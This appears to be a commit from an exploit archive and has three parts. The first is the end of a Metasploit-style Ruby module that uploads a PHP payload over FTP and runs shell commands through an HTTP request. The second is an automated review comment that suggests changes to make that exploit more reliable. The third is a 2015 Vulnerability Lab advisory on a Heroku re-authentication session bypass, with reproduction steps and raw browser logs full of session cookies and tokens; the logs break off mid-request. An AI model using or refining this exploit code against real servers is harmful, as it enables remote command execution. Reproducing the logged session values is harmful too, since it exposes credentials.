unless res && res.include?('250')
fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying PHP payload to website path, directory not writable?")
end
sock.close
print_status("#{peer} - Executing PHP payload #{target_uri.path}#{payload_name}")
res = send_request_cgi!(
'uri' => normalize_uri(target_uri.path, payload_name),
'method' => 'GET',
'vars_get' => { get_arg => "nohup #{payload.encoded} &" }
)
unless res && res.code == 200
fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure executing payload")
end
end
end
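Review bot: check() sends with `sock.puts` while exploit() uses Rex's `sock.put`; both happen to work only because the strings already end in a newline (IO#puts would otherwise append one), so use `put` consistently. `Rex::Socket.create_tcp` raises on connection failure rather than returning nil, so the `if sock.nil?` branches in check() and exploit() are dead code; let the exception propagate or rescue `Rex::ConnectionError`. check() never closes its socket and calls fail_with() for an unreachable or unexpected server, where a check should return `CheckCode::Unknown`. Replies are tested with `include?('350')` / `include?('250')`, which also matches any banner or message text containing those digits; anchor on the reply code at line start (e.g. `res =~ /^350 /`). `Msf::Exploit::Remote::Tcp` is included but never used (all FTP traffic goes through Rex::Socket directly) and it brings a second RPORT definition alongside HttpClient's; drop it. Finally, the failure message on the HTTP request at the end reports `#{rhost}:#{ftp_port}` although that step talks to the web port; use `peer` there as the preceding print_status already does.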


@ -0,0 +1,434 @@
Document Title:
===============
Heroku Bug Bounty #2 - (API) Re Auth Session Bypass Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1323
Video: http://www.vulnerability-lab.com/get_content.php?id=1336
Vulnerability Magazine: http://magazine.vulnerability-db.com/?q=articles/2015/06/09/heroku-bug-bounty-2015-api-re-auth-session-token-bypass-vulnerability
Release Date:
=============
2015-06-09
Vulnerability Laboratory ID (VL-ID):
====================================
1323
Common Vulnerability Scoring System:
====================================
6.1
Product & Service Introduction:
===============================
Heroku provides you with all the tools you need to iterate quickly, and adopt the right technologies for your project.
Build modern, maintainable apps and instantly extend them with functionality from hundreds of cloud services providers
without worrying about infrastructure. Build. Deploy. Scale. Heroku brings them together in an experience built and
designed for developers. Scale your application by moving a slider and upgrade your database in a few simple steps.
Whether your growth happens over the year or overnight, you can grow on demand to capture opportunity.
Heroku (pronounced her-OH-koo) is a cloud application platform a new way of building and deploying web apps. Our service
lets app developers spend their time on their application code, not managing servers, deployment, ongoing operations, or scaling.
Heroku was founded in 2007 by Orion Henry, James Lindenbaum, and Adam Wiggins.
(Copy of the Vendor Homepage: https://www.heroku.com/home )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research team discovered a application-side session validation vulnerability in the official Heroku API and web-application.
Vulnerability Disclosure Timeline:
==================================
2014-09-19: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2014-09-20: Vendor Notification (Heroku Security Team - Bug Bounty Program)
2015-03-11: Vendor Response/Feedback (Heroku Security Team - Bug Bounty Program)
2015-06-08: Vendor Fix/Patch Notification (Heroku Developer Team)
2015-06-09: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Heroku
Product: Heroku Dashboard - Web Application (API) 2014 Q3
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
An application-side re-auth session bypass vulnerability has been discovered in the official heroku API & web-application service.
The vulnerability allows an attacker to request unauthorized information without the second forced re authentication module.
The heroku web-service provides to all web services an expire session function that disallows to visit the page without re authentication.
The dataclips page session of the editor and the postgres service allows to add for example new context. If the session expires in the main
heroku web-service the user will be forced to login again.
During the tests we releaved that the session of the dataclip service and editor is available even if the re-authentication service is still running.
If the local attacker changes the path manually to request directly the stored context in the profile (like shown in video) he is able to bypass the
security mechanism to add or request the database name.
The session validation mechnism needs to provoke a refresh of the progres datasheet page or the dataclips add through editor to prevent unauthorized
access after a session has been expired during the usage of the heroku service.
The security risk of the re-auth session bypass vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 6.1.
Exploitation of the vulnerability requires a local low privilege heroku application user account without user interaction. Successful exploitation
of the vulnerability results in the evade and bypass of the re-authentication mechanism.
Proof of Concept (PoC):
=======================
The local re auth bypass vulnerability can be exploited by local attackers with low privilege web-application user account or
by remote attackers without privlege web-application account and high user interaction. For security demonstration or to reproduce
the security vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the re-auth bypass vulnerability ...
1. Register a webpage account at the official heroku website
2. Provoke the re-auth function that pops up after several profile interaction during the time after the session expired
3. When the session is expired to do not press the re-auth function button that popup stable to all service
4. Switch back to the postgres.heroku service and add dataclips or own databases even if the session is expired to all other modules and sites
Note: Even if all session are expired the user is able to request the database and the dataclips in the service without authorization
5. Successful reproduce of the session vulnerability!
Video Demonstration
The video demonstrates the vulnerability in the re-auth function of the heroku service which affects only the heroku service with the dataclips and databases.
The session expired values also needs to be recognized in the database service and the site validation request to prevent access without re-auth to heroku itself.
Exception Message:
-Your session has expired
--Your current session has expired or become inactive and has been terminated.
---Please log in again to continue using Dashboard.
--- PoC Session Logs ---
17:55:32.218[718ms][total 718ms] Status: 303[See Other]
GET https://id.heroku.com/logout Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html]
Request Header:
Host[id.heroku.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://www.heroku.com/home]
Cookie[ref=KZaqbfoPQd2NM5_HmtNkDBgaDRYcVm4FgoRlK3QXRYUX5XYlLVpbKsbv-DvM8FmqnHEUYhAmss84wkpN3jOao6PJyJ90AhbTjDrK5i7V20kDxZvoen4Zz_bztDsXTa1J%7CTzM52sJrCEMP3TpTvJzGMA%3D%3D%7C4a7a7f34648ede535a79a2bc56dd9366b7df78a1462aa844f86196b14609e103; _ga=GA1.2.181049422.1411214008; __utma=148535982.181049422.1411214008.1411216956.1411228016.3; __utmc=148535982; __utmz=148535982.1411216956.2.2.utmcsr=postgres.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/databases; optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22%3A%22ff%22%2C%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D; optimizelyEndUserId=oeu1411214007860r0.1948891553088572; optimizelyBuckets=%7B%7D; rack.session=sqPL2wMwiUxRKRDIZRZpFZtpQVHNL051XZMscTdZzo85hsFiMzwNrL-ZgLLCf8llJTtLTk8ilInCKAeHek3hJ971JEcCHKfGmen-xMGjed0pjaT5KG1CKDBB-oPo5z_trM8eSSBDiLUnva-T9N6Pty3jwbNpxFYeHFG79jB1K1j-lc_-dB8tACasWzQbFPc5d-6ampRWbPJf4ZQhglDefQdPrvLEqwO5BD5uXKzT2WKvilkEqdnzzbUKXm3WD1GMWZwqsV6hkeUJMn5vbsVb32yIm1r7sWL5WxuYMvbTpEdMWcA5mDJzoc0ME_Oo0F4Sz3lhIxBhipySHAYlAiR6B7SQCocJGSCqIJckDiQ_cZ5wY8s2hmGAvL2YKGb4gZGLMR2VvJDC8AEOhbS5ofhZDrYTvEaRCFgqweI3KGFQlcie7C2AQnYFgo7UfnilQsLZEVKAZnJ_f6wy3t9a108LwzUxg5aQ27mYexe5IK3Ei2ji5BNFcphWiujvrHG4TjtQwtxfF6eZZhTurqM1Rcwle2hPfQqQlSMrEf54dh_nurL6Oyh3mMHi68mhDZm6zIaAq-GCGpx8PwNhwZ8Wp1ZjmD04fFsPKBZBA9pJ2IMuP5NBgP6dpkPuPa1MxIlDpPuz6PuK_ONBKPI-ApKey2g6_6r6dHXBZU-dBMAX9nNm16r7rEoJR4StN3ApBazWVxHDTMJdprFoMbcAYsUEsjFQBMuNMwe3GKxvFKNynwK-GWsjCxL_BMe8pZQVaW7h-qSZWydA4Pmx9VmkTdEZ7e4BXiGXZCUo6et8QyZLK4SfV4tod03s6MkB3nbWjSLEsJyo4KQSDu4jJyqP7g9nvRuJz67XHl_pTLcV2updPygb3qrlyeFZLhuXtjsDbpWHMxWjvjhX7g63QkdsCSsytKBOYNsKZu8npvW59b3U6jO-aB-ZN4hMDbogRSKRhRE1bIrN%7CbHVM61lFujhv41-3Kbdezg%3D%3D%7C90aed411ab431962695b4954963c46d29c694c5b89ee793a1654e400d0830070; _ga=GA1.3.181049422.1411214008; visitor_id36622=273629684; heroku_session=1; heroku_session_nonce=891e297c-fed0-4932-8c59-32d7d341f4dc; 
__utmb=148535982.59.9.1411228524365; optimizelyPendingLogEvents=%5B%22n%3Dengagement%26g%3D170873954%26u%3Doeu1411214007860r0.1948891553088572%26wxhr%3Dtrue%26t%3D1411228532074%26f%3D%22%2C%22n%3Dhttps%253A%252F%252Fwww.heroku.com%252Fhome%26u%3Doeu1411214007860r0.1948891553088572%26wxhr%3Dtrue%26t%3D1411228529309%26f%3D%22%5D]
Connection[keep-alive]
Response Header:
Server[Cowboy]
Date[Sat, 20 Sep 2014 15:55:42 GMT]
Connection[keep-alive]
Strict-Transport-Security[max-age=31536000]
X-Frame-Options[SAMEORIGIN]
X-XSS-Protection[1; mode=block]
x-content-type-options[nosniff]
Content-Type[text/html;charset=utf-8]
Set-Cookie[heroku_session=; domain=.heroku.com; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:00 -0000; secure
heroku_session_nonce=; domain=.heroku.com; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:00 -0000; secure
rack.session=FaVrS4hqnR9mnjhckrTvVfSsfPhzKXgca1SNr8Oyr6N_-ub6c_egK8dLEHO_KeAnQB1aERkdfw_LeQdQHfDHrK-3DK91e12mqCMinL-Fsdndcdg7ZY1hyrdSQXmcs1ER5d2gkk4BeU8nn2irz9fWX7Qnwmax_MKaYj1JyCxhpwGBESHwyiMOtW0v4EAuhdDi1k31ltpEem6D7VXfj-2izYDDwNrCLOOYyifekUr2YnViziFTFcnECk7ynTFG7LrK%7CczNDqJrktR8EodaST7bDZA%3D%3D%7C855c1f5d2b8faf34a68e30535e723bfa6c2eec88e4819c36e02dba20099c14ed; path=/; expires=Mon, 20 Oct 2014 15:55:43 -0000; HttpOnly; secure]
Location[https://id.heroku.com/login]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Request-Id[17eefe38-a226-46fc-8e1d-2f673d87db10]
Transfer-Encoding[chunked]
Via[1.1 vegur]
17:55:32.937[159ms][total 818ms] Status: 200[OK]
GET https://id.heroku.com/login Load Flags[LOAD_DOCUMENT_URI LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html]
Request Header:
Host[id.heroku.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://www.heroku.com/home]
Cookie[ref=KZaqbfoPQd2NM5_HmtNkDBgaDRYcVm4FgoRlK3QXRYUX5XYlLVpbKsbv-DvM8FmqnHEUYhAmss84wkpN3jOao6PJyJ90AhbTjDrK5i7V20kDxZvoen4Zz_bztDsXTa1J%7CTzM52sJrCEMP3TpTvJzGMA%3D%3D%7C4a7a7f34648ede535a79a2bc56dd9366b7df78a1462aa844f86196b14609e103; _ga=GA1.2.181049422.1411214008; __utma=148535982.181049422.1411214008.1411216956.1411228016.3; __utmc=148535982; __utmz=148535982.1411216956.2.2.utmcsr=postgres.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/databases; optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22%3A%22ff%22%2C%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D; optimizelyEndUserId=oeu1411214007860r0.1948891553088572; optimizelyBuckets=%7B%7D; rack.session=FaVrS4hqnR9mnjhckrTvVfSsfPhzKXgca1SNr8Oyr6N_-ub6c_egK8dLEHO_KeAnQB1aERkdfw_LeQdQHfDHrK-3DK91e12mqCMinL-Fsdndcdg7ZY1hyrdSQXmcs1ER5d2gkk4BeU8nn2irz9fWX7Qnwmax_MKaYj1JyCxhpwGBESHwyiMOtW0v4EAuhdDi1k31ltpEem6D7VXfj-2izYDDwNrCLOOYyifekUr2YnViziFTFcnECk7ynTFG7LrK%7CczNDqJrktR8EodaST7bDZA%3D%3D%7C855c1f5d2b8faf34a68e30535e723bfa6c2eec88e4819c36e02dba20099c14ed; _ga=GA1.3.181049422.1411214008; visitor_id36622=273629684; __utmb=148535982.59.9.1411228524365; optimizelyPendingLogEvents=%5B%22n%3Dengagement%26g%3D170873954%26u%3Doeu1411214007860r0.1948891553088572%26wxhr%3Dtrue%26t%3D1411228532074%26f%3D%22%2C%22n%3Dhttps%253A%252F%252Fwww.heroku.com%252Fhome%26u%3Doeu1411214007860r0.1948891553088572%26wxhr%3Dtrue%26t%3D1411228529309%26f%3D%22%5D]
Connection[keep-alive]
Response Header:
Server[Cowboy]
Date[Sat, 20 Sep 2014 15:55:42 GMT]
Connection[keep-alive]
Strict-Transport-Security[max-age=31536000]
X-Frame-Options[SAMEORIGIN]
X-XSS-Protection[1; mode=block]
x-content-type-options[nosniff]
Content-Type[text/html;charset=utf-8]
Set-Cookie[heroku_session=; domain=.heroku.com; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:00 -0000; secure
heroku_session_nonce=; domain=.heroku.com; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:00 -0000; secure
rack.session=HSkfR06GR1NnxhFxsmBIy0sVnJareQJv2qjGRfPXqF3Dxw-NQDVWTkf5IxbkOvB9Z8WGGhGe2f4_P7ZkiWLRnuY_mYbgteaZNCrRtb13u0v7TCQN96dgWRfbP5lSlsLzJ3A_QBzFn0LtDWiUwv1GIPgmrGvMMRRNm6k7YRgVDF1VUVKLyo4eJ57fFw6kQG6_QeSZXL2pYCnvRe779I47DXgY-VrPXUbI5Uk9Cznr49pEvkkRfb3QatvMR8el3E8QT6StkYQQEDwzL2ZYJroQXhHPMa-yHcGVoNATooiumbPXBEOM1a-fKUdJ7s56yZ9l93Ie4fVxLOUtRRtjJd-O7Sg3FLqdiNM7siMYpSD_gxh_XT3hWYbd4h5t9Xoj_zgOtxiDJlM63RchlyCtoFERag%3D%3D%7CFvfX9eXB36GDcprUj47Nrg%3D%3D%7C3212ecd5bcd6a88fd376d7bd6a58dda06d5de2e01f9b066d2dce3e441b8d09b2; path=/; expires=Mon, 20 Oct 2014 15:55:43 -0000; HttpOnly; secure]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Request-Id[6c5a1418-f70d-4eb5-901c-8b333e82d2e3]
Transfer-Encoding[chunked]
Via[1.1 vegur]
17:56:11.833[437ms][total 437ms] Status: 302[Found]
GET https://postgres.heroku.com/databases Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html]
Request Header:
Host[postgres.heroku.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://dataclips.heroku.com/clips/new]
Cookie[ref=KZaqbfoPQd2NM5_HmtNkDBgaDRYcVm4FgoRlK3QXRYUX5XYlLVpbKsbv-DvM8FmqnHEUYhAmss84wkpN3jOao6PJyJ90AhbTjDrK5i7V20kDxZvoen4Zz_bztDsXTa1J%7CTzM52sJrCEMP3TpTvJzGMA%3D%3D%7C4a7a7f34648ede535a79a2bc56dd9366b7df78a1462aa844f86196b14609e103; _ga=GA1.2.181049422.1411214008; __utma=148535982.181049422.1411214008.1411216956.1411228016.3; __utmc=148535982; __utmz=148535982.1411216956.2.2.utmcsr=postgres.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/databases; optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22%3A%22ff%22%2C%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D; optimizelyEndUserId=oeu1411214007860r0.1948891553088572; optimizelyBuckets=%7B%7D; _session_id=BAh7CEkiD3Nlc3Npb25faWQGOgZFVEkiJWU0MWEyZTc5NDc5M2Q4YTI0MDg5OTUzZjYxODNkYTc3BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMVRtUk91NGFhNWZBdDVRRURTem9XRmtWZkloRkFuMldMREJDYXZHd3ltK1E9BjsARkkiD2NzcmYudG9rZW4GOwBUSSIxbjJoak5xNkRSNEdkaWlOak1JOTJ2VHB5dmtqK1NKYW8xNXBwLy9oSHhMUT0GOwBG--16c1365df04da320c8f856f41afe6b154b068da3; user_session_secret=BAhJIgHCUms1UlVXbGhSelUzZFRFd1VuRk5TMWhDU0ZWRVptMXRkVnBWVVVjeFQyaHBTWGh6VEdOc2NHWXdiVmRDWTFZMWNVdFVWMGhuUTFKSVowNW5lV3BaUjNrNE1teEtTVTlCT0RNclZDdFdTR2xHVkM5elVtYzlQUzB0U2pWaWFEbGlNM0pLVTBkSlFWSlRPRTlIUTJaaFFUMDktLTc0MTM3N2ZhOTc5ZmRiYjNmMjI2N2EzYzU1NmNlOTRkYmNjMzg2YzkGOgZFRg%3D%3D--0423c026f66ea9da3bf9c5f335ac142a95b2e819; postgres_session_nonce=891e297c-fed0-4932-8c59-32d7d341f4dc; __utmb=148535982.62.9.1411228524365]
Connection[keep-alive]
Response Header:
Server[Cowboy]
Connection[close]
Date[Sat, 20 Sep 2014 15:56:22 GMT]
status[302 Found]
Strict-Transport-Security[max-age=99; includeSubdomains]
X-Frame-Options[SAMEORIGIN]
X-XSS-Protection[1]
Location[https://postgres.heroku.com/login]
Content-Type[text/html; charset=utf-8]
x-ua-compatible[IE=Edge,chrome=1]
Cache-Control[no-cache, private]
Set-Cookie[_session_id=BAh7CUkiD3Nlc3Npb25faWQGOgZFVEkiJWU0MWEyZTc5NDc5M2Q4YTI0MDg5OTUzZjYxODNkYTc3BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMVRtUk91NGFhNWZBdDVRRURTem9XRmtWZkloRkFuMldMREJDYXZHd3ltK1E9BjsARkkiD2NzcmYudG9rZW4GOwBUSSIxbjJoak5xNkRSNEdkaWlOak1JOTJ2VHB5dmtqK1NKYW8xNXBwLy9oSHhMUT0GOwBGSSIQcmVkaXJlY3RfdG8GOwBGIg8vZGF0YWJhc2Vz--ed40c9baff4bd3ebaeb5a84c4b9afc6831c4b2a0; path=/; secure; HttpOnly]
x-request-id[3757ef00-dcc8-44e7-9413-c3d1beab8f0d]
x-runtime[0.008472]
x-rack-cache[miss]
Via[1.1 vegur]
17:56:12.273[183ms][total 183ms] Status: 302[Found]
GET https://postgres.heroku.com/login Load Flags[LOAD_DOCUMENT_URI LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html]
Request Header:
Host[postgres.heroku.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://dataclips.heroku.com/clips/new]
Cookie[ref=KZaqbfoPQd2NM5_HmtNkDBgaDRYcVm4FgoRlK3QXRYUX5XYlLVpbKsbv-DvM8FmqnHEUYhAmss84wkpN3jOao6PJyJ90AhbTjDrK5i7V20kDxZvoen4Zz_bztDsXTa1J%7CTzM52sJrCEMP3TpTvJzGMA%3D%3D%7C4a7a7f34648ede535a79a2bc56dd9366b7df78a1462aa844f86196b14609e103; _ga=GA1.2.181049422.1411214008; __utma=148535982.181049422.1411214008.1411216956.1411228016.3; __utmc=148535982; __utmz=148535982.1411216956.2.2.utmcsr=postgres.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/databases; optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22%3A%22ff%22%2C%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D; optimizelyEndUserId=oeu1411214007860r0.1948891553088572; optimizelyBuckets=%7B%7D; _session_id=BAh7CUkiD3Nlc3Npb25faWQGOgZFVEkiJWU0MWEyZTc5NDc5M2Q4YTI0MDg5OTUzZjYxODNkYTc3BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMVRtUk91NGFhNWZBdDVRRURTem9XRmtWZkloRkFuMldMREJDYXZHd3ltK1E9BjsARkkiD2NzcmYudG9rZW4GOwBUSSIxbjJoak5xNkRSNEdkaWlOak1JOTJ2VHB5dmtqK1NKYW8xNXBwLy9oSHhMUT0GOwBGSSIQcmVkaXJlY3RfdG8GOwBGIg8vZGF0YWJhc2Vz--ed40c9baff4bd3ebaeb5a84c4b9afc6831c4b2a0; user_session_secret=BAhJIgHCUms1UlVXbGhSelUzZFRFd1VuRk5TMWhDU0ZWRVptMXRkVnBWVVVjeFQyaHBTWGh6VEdOc2NHWXdiVmRDWTFZMWNVdFVWMGhuUTFKSVowNW5lV3BaUjNrNE1teEtTVTlCT0RNclZDdFdTR2xHVkM5elVtYzlQUzB0U2pWaWFEbGlNM0pLVTBkSlFWSlRPRTlIUTJaaFFUMDktLTc0MTM3N2ZhOTc5ZmRiYjNmMjI2N2EzYzU1NmNlOTRkYmNjMzg2YzkGOgZFRg%3D%3D--0423c026f66ea9da3bf9c5f335ac142a95b2e819; postgres_session_nonce=891e297c-fed0-4932-8c59-32d7d341f4dc; __utmb=148535982.62.9.1411228524365]
Connection[keep-alive]
Response Header:
Server[Cowboy]
Connection[close]
Date[Sat, 20 Sep 2014 15:56:22 GMT]
status[302 Found]
Strict-Transport-Security[max-age=99; includeSubdomains]
X-Frame-Options[SAMEORIGIN]
X-XSS-Protection[1]
Location[https://postgres.heroku.com/auth/heroku]
Content-Type[text/html; charset=utf-8]
x-ua-compatible[IE=Edge,chrome=1]
Cache-Control[no-cache, private]
Set-Cookie[user_session_secret=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT; secure
super_user_session_secret=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT; secure
postgres_session_nonce=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT; secure]
x-request-id[aab5515c-db99-4516-afb9-f81c6d7427e3]
x-runtime[0.005907]
x-rack-cache[miss]
Via[1.1 vegur]
17:56:13.046[161ms][total 897ms] Status: 200[OK]
GET https://id.heroku.com/login Load Flags[LOAD_DOCUMENT_URI LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html]
Request Header:
Host[id.heroku.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://dataclips.heroku.com/clips/new]
Cookie[ref=KZaqbfoPQd2NM5_HmtNkDBgaDRYcVm4FgoRlK3QXRYUX5XYlLVpbKsbv-DvM8FmqnHEUYhAmss84wkpN3jOao6PJyJ90AhbTjDrK5i7V20kDxZvoen4Zz_bztDsXTa1J%7CTzM52sJrCEMP3TpTvJzGMA%3D%3D%7C4a7a7f34648ede535a79a2bc56dd9366b7df78a1462aa844f86196b14609e103; _ga=GA1.2.181049422.1411214008; __utma=148535982.181049422.1411214008.1411216956.1411228016.3; __utmc=148535982; __utmz=148535982.1411216956.2.2.utmcsr=postgres.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/databases; optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22%3A%22ff%22%2C%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D; optimizelyEndUserId=oeu1411214007860r0.1948891553088572; optimizelyBuckets=%7B%7D; rack.session=Oj3BV4aM5iZSvASRXbZL38nzvzIIh2T_S6vdquNUi-OZ6JARZBmQ2zTzwbXj9r1M5TY2tCgCUDV6CmJzJm06aX0EH6gr2QJTjzVd64_n-FlnBUmFFLaDc_gtbPTYX3K8SsDCHAVVhA75xb6j6bvFqlPk-Ne-848PcKFchgdKGSflzC8_-Wfqqg9hppwmjdb6ia9bKqejpkXY49b0ehF8FxQp8s7etE4YxhHhvIzJqxUd3oxBjZo_F2Zoec30Cc6dRuPk5J8bocsC8_8Zq09DoZFqN_DOG41HDlbKIW1TKUtFLfCvuQ3KoE7cjM7dSdVzZZf7uehizmAGWkBPIWp-fJRoUG3L2Rpoo0VZdN_ih-BGCtGMNiFb3K4586XR9yQWMuEiikHz1yhZp_fK7oZk60Ps3vTnNi1zGxRcfW_N3ScLeVLSyHMqefqlqtVMAWqTf5qP5pbBhbPiwJKTnowmmNPx92DrmkqWD0SrdKHOVtcWrCvwmNW5dzG7zAFQ_BMFAU-1c7BDbIkTSBEI0YuSu48HuLkTAjNPJBuSLXJkj42h1MPsx3Vxz8HakjQxIJt1KirqkcQdZTlPheoKI0iYpi4V27TRMZtrb8AZh9mMtEo435snF2SDhMHSdzniCMlA7G-Ngw4EheMslTp5BsqmhIQiy0-hklsUKnMX8Hedh3g%3D%7CwHQzLOXMlHCSl_paZ8IydQ%3D%3D%7Cc627cc2ac2f61b0720781b7b15c81836840a4546ae4365f68d3c89ffd9d513d5; _ga=GA1.3.181049422.1411214008; visitor_id36622=273629684; __utmb=148535982.62.9.1411228524365]
Connection[keep-alive]
Response Header:
Server[Cowboy]
Date[Sat, 20 Sep 2014 15:56:22 GMT]
Connection[keep-alive]
Strict-Transport-Security[max-age=31536000]
X-Frame-Options[SAMEORIGIN]
X-XSS-Protection[1; mode=block]
x-content-type-options[nosniff]
Content-Type[text/html;charset=utf-8]
Set-Cookie[heroku_session=; domain=.heroku.com; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:00 -0000; secure
heroku_session_nonce=; domain=.heroku.com; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:00 -0000; secure
rack.session=P8zZlFpkxJkI4ZLxjTorLaS7chYJ_xvm3tBRWqep-FyoNj_WSHDck99ggLaKgLczUMG6QylLu1VbNinWWd2uTvosTC3p811iQmobo8BwOeNgaY-Iyei8yP-c294TzPqzGmipSdIDCpCJJNlRu9fNDBgAppjFQi8lwNVmyyVPgwZc1tMa6KBi9Dx9Z6QxGLGykZPfxZvLCXHanhPgfRdxttpcO4uG-zklXg7kHrAri8MDvjXJbXvXr-BBnkWbr1hPFOH2z7BZXiBvTeKIuB6N_fqOEredXT8KRwcVGHxoHRFVsBQvr8bFqR8C_ImSzTqpkjjA_32wqf_t8oyVyGRt6Wf2RAjCO2Ve9nvECAaMhlA0AAChwZ7zPDYErU6WPGumLDLGGQJyeRxB31TPehBownCAIAtyZIBmoBmnCNRM5t6czeCBR1U7xMTBctVh58lH-0WIE1uESRcFYGiEjrefszmsjtQuv8XOS3i0zqBn4e7rKe5BQvvm_lWLlDOumVoMa7OKsaV7TuprlYP4n5LpWeOenBxb1JtTY8ASoQzv3rllKfG_LuQn0OGHVnCu9BsSd6B9qdZKqNZL1kA2xlt3SKrjt5qgIpLs3Wq4N3H3n5yXCIKduxNkqDFd5bJ8Ibx1prC44SktuOnv4v9xQaCTtWfw3NI_068iXRGBt0sDnq0%3D%7Cdyw4qNVeN1QJkse0PYVkMA%3D%3D%7Cf92ff337070c04e0bc1331b08bd2d38420af6bea0707a1ccfc813d4ce3b89c82; path=/; expires=Mon, 20 Oct 2014 15:56:23 -0000; HttpOnly; secure]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Request-Id[8583828c-b434-43b4-a8a2-9df47b64d82d]
Transfer-Encoding[chunked]
Via[1.1 vegur]
17:56:37.841[603ms][total 603ms] Status: 302[Found]
GET https://dashboard.heroku.com/account Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html]
Request Header:
Host[dashboard.heroku.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://dataclips.heroku.com/]
